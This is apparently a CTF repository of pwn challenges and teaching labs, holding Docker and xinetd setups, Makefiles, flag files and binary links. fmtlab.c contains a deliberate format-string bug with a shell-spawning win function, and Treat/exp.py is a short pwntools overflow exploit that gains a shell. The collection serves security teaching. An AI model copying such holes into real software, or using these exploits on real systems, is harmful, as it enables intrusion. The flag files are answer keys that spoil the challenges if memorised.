disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/sentinel/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = root 10 | groups = yes 11 | env = HOME=/home/sentinel/ 12 | bind = 0.0.0.0 13 | port = 10101 14 | flags = REUSE 15 | } 16 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/exploit/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all exp.c -o exp 3 | strip exp 4 | 5 | clean: 6 | rm exp 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Sentinel/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | original: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all -DDO_LOG sentinel.c -o sentinel 3 | strip sentinel 4 | 5 | revenge: 6 | patch -p0 sentinel.c source.diff -o sentinelRevenge.c 7 | gcc -Wl,-z,now -fpie -fstack-protector-all -DDO_LOG sentinelRevenge.c -o sentinelRevenge 8 | strip sentinelRevenge 9 | rm sentinelRevenge.c 10 | 11 | all: original revenge 12 | 13 | clean: 14 | rm sentinel sentinelRevenge 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Survey 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Anything you want to tell us? 
9 | 10 | Estimated Difficulty : 11 | 3/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m survey 8 | RUN chown -R root:root /home/survey 9 | RUN chmod -R 755 /home/survey 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | robot: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/survey:ro 8 | - ./xinetd:/etc/xinetd.d/survey:ro 9 | ports: 10 | - "30201:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{7h4nks_f0r_y0ur_f33dback} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/survey/survey 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/share/survey: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Survey/distribute/share/survey 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service survey 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/survey/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = survey 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Survey/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -z now -z noexecstack -fstack-protector survey.c -o survey 3 | strip survey 4 | 5 | clean: 6 | rm survey 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | GOTlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | playing with lookup tables 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m GOTlab 8 | RUN chown -R root:root /home/GOTlab 9 | RUN chmod -R 755 /home/GOTlab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: 
'3' 2 | 3 | services: 4 | gotlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/GOTlab:ro 8 | - ./xinetd:/etc/xinetd.d/gotlab:ro 9 | ports: 10 | - "30103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/GOTlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/GOTlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{loop_and_loop_and_loop} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/GOTlab/GOTlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service gotlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/GOTlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = GOTlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/GOTlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,relro -no-pie -fstack-protector-all GOTlab.c -o GOTlab 3 | strip GOTlab 4 | 5 | clean: 6 | rm GOTlab 7 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | ROPlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | plain ROP 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m ROPlab 8 | RUN chown -R root:root /home/ROPlab 9 | RUN chmod -R 755 /home/ROPlab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | roplab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/ROPlab:ro 8 | - ./xinetd:/etc/xinetd.d/roplab:ro 9 | ports: 10 | - "30102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/ROPlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/ROPlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/flag: 
-------------------------------------------------------------------------------- 1 | FLAG{leak_and_ROP} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/ROPlab/ROPlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service roplab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ROPlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ROPlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/ROPlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all ROPlab.c -o ROPlab 3 | strip ROPlab 4 | 5 | clean: 6 | rm ROPlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | fastbinlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | need for speed 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m fastbinlab 7 | RUN chown -R root:root /home/fastbinlab 8 | RUN chmod -R 755 /home/fastbinlab 9 | 10 | CMD 
["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | fastbinlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/fastbinlab:ro 8 | - ./xinetd:/etc/xinetd.d/fastbinlab:ro 9 | ports: 10 | - "30105:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/fastbinlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/fastbinlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{take_the_blue_pill_you_stay_safe_take_the_red_pill_godspeed_to_shell} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/fastbinlab/fastbinlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service fastbinlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/fastbinlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = fastbinlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fastbinlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all fastbinlab.c -o fastbinlab 3 | strip fastbinlab 4 | 5 | clean: 6 | rm fastbinlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | fmtlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | even ssl VPN makes mistakes 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m fmtlab 8 | RUN chown -R root:root /home/fmtlab 9 | RUN chmod -R 755 /home/fmtlab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | fmtlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/fmtlab:ro 8 | - ./xinetd:/etc/xinetd.d/fmtlab:ro 9 | ports: 10 | - "30104:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/flag: 
-------------------------------------------------------------------------------- 1 | FLAG{fmt_all_the_way} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/fmtlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/fmtlab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/fmtlab/fmtlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service fmtlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/fmtlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = fmtlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all fmtlab.c -o fmtlab 3 | strip fmtlab 4 | 5 | clean: 6 | rm fmtlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/fmtlab/sourcecode/fmtlab.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void initproc(){ 5 | setvbuf(stdin,NULL,_IONBF,0); 6 | setvbuf(stdout,NULL,_IONBF,0); 7 | setvbuf(stderr,NULL,_IONBF,0); 8 | return; 9 | } 10 | 11 | void win(){ 12 | 
system("/bin/sh"); 13 | return; 14 | } 15 | 16 | /* Prompt/echo loop: each pass reads one whitespace-delimited token of at most 31 bytes into the 32-byte buf and prints it back; end is never cleared inside the loop, so it only stops when the process does. */ int main(){ 17 | initproc(); 18 | int end=1; 19 | char buf[0x20]; 20 | while(end){ 21 | printf("Your message : "); 22 | scanf("%31s",buf); 23 | printf(buf); /* NOTE(review): buf is passed as the format string, so conversion specifiers in the input are interpreted by printf; this looks like the lab's deliberate bug. Outside a lab, print with printf("%s", buf) and build with -Wformat -Wformat-security so the compiler reports it. */ 24 | } 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | shelllab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | open read write 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m shelllab 8 | RUN chown -R root:root /home/shelllab 9 | RUN chmod -R 755 /home/shelllab 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | shelllab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/shelllab:ro 8 | - ./xinetd:/etc/xinetd.d/shelllab:ro 9 | ports: 10 | - "30101:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{easiest_shellcode_possible} 2 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/shelllab/shelllab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/shelllab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/shelllab/distribute/share/shelllab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service shelllab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/shelllab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = shelllab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/shelllab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all shelllab.c -o shelllab 4 | strip shelllab 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm shelllab 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | stashlab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | one vuln to break it all 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m stashlab 7 | RUN chown -R root:root /home/stashlab 8 | RUN chmod -R 755 /home/stashlab 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | stashlab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/stashlab:ro 8 | - ./xinetd:/etc/xinetd.d/stashlab:ro 9 | ports: 10 | - "30107:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{non_secure_stashing_leads_to_heap_bashing} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/stashlab/stashlab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/stashlab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/stashlab/distribute/share/stashlab -------------------------------------------------------------------------------- 
/MyChallenges/Pwn/TeachingLabs/stashlab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service stashlab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/stashlab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = stashlab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/stashlab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all stashlab.c -o stashlab 3 | strip stashlab 4 | 5 | clean: 6 | rm stashlab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | tcachelab 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | faster than fastbin 9 | 10 | Estimated Difficulty : 11 | 0/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m tcachelab 7 | RUN chown -R root:root /home/tcachelab 8 | RUN chmod -R 755 /home/tcachelab 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | tcachelab: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/tcachelab:ro 8 | - ./xinetd:/etc/xinetd.d/tcachelab:ro 9 | ports: 10 | - "30106:10101" 11 | expose: 12 | - 
"10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{key_am_i_a_joke_to_you} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/tcachelab/tcachelab 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/tcachelab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/share/tcachelab -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service tcachelab 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/tcachelab/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = tcachelab 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/TeachingLabs/tcachelab/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all tcachelab.c -o tcachelab 3 | strip tcachelab 4 | 5 | clean: 6 | rm tcachelab 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Treat 
3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | We sell all kinds of treat here, would you care to try our flagship coffee? 9 | p.s. It is not only delicious, but also environment friendly 10 | 11 | Estimated Difficulty : 12 | 0/10 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m treat 11 | COPY treat flag /home/treat/ 12 | RUN chown -R root:treat /home/treat 13 | RUN chmod -R 750 /home/treat/ 14 | EXPOSE 4444 15 | USER treat 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/treat/treat 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | ###Addr 4 | # libc2.29 5 | name_buf = 0x405080 6 | func = 0x401186 7 | 8 | ###Exploit 9 | r = process('./treat') 10 | 11 | r.sendlineafter('name : ','TREAT=/bin/sh') 12 | r.sendlineafter('(1~3) : ',b'1'*0x138+p64(name_buf)[:3]) 13 | r.sendlineafter('feedback : ',b'1'*0x48+p64(func)[:3]) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/flag: -------------------------------------------------------------------------------- 1 | FLAG{Halloween+Thanksgiving+XMas=Treats!!!!} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Treat/treat: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Treat/treat -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/UnicornsAisle.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/UnicornsAisle.pdf -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/DISTNOTE: -------------------------------------------------------------------------------- 1 | unicorn engine commit : 3fadb5aa5aad22926f5f816dbe396f8661990374 2 | docker ubuntu hash : ba6acccedd29 3 | 4 | since mapping layout is highly delicate and changes with docker setup, keep hash here for reference 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update 7 | RUN apt-get install xinetd -y 8 | RUN useradd -m UnicornsAisle 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | unicornsaisle: 5 | build: . 
6 | volumes: 7 | - ./share:/home/UnicornsAisle:ro 8 | - ./libunicorn.so.1:/lib/x86_64-linux-gnu/libunicorn.so.1 9 | - ./xinetd:/etc/xinetd.d/unicornsaisle:ro 10 | ports: 11 | - "10101:10101" 12 | expose: 13 | - "10101" 14 | restart: always 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/libunicorn.so.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/distribute/libunicorn.so.1 -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/encounter.emu: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/distribute/share/encounter.emu -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/UnicornsAisle/ 6 | timeout 99 /home/UnicornsAisle/unicornsAisle /home/UnicornsAisle/encounter.emu 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornInterlude: -------------------------------------------------------------------------------- 1 | BALSN{Unl34sh_cha1n_0f_m4gic_4nd_achi3ve_7h3_1mp055ibl3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornPostlude: -------------------------------------------------------------------------------- 1 | BALSN{r4m_4_bl0ck_1nt0_th3_illus10n_0f_invinc1bil1ty} 2 | 
-------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornPrelude: -------------------------------------------------------------------------------- 1 | BALSN{7h3_un1c0rn_qu1v3rs_4nd_f4lls_und3r_y0ur_sw0rd} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornsAisle: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Unicorns_Aisle/distribute/share/unicornsAisle -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service unicornsaisle 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/UnicornsAisle/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = UnicornsAisle 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Unicorns_Aisle/sourcecode/Server/build.sh: -------------------------------------------------------------------------------- 1 | #gcc (GCC) 11.1.0 2 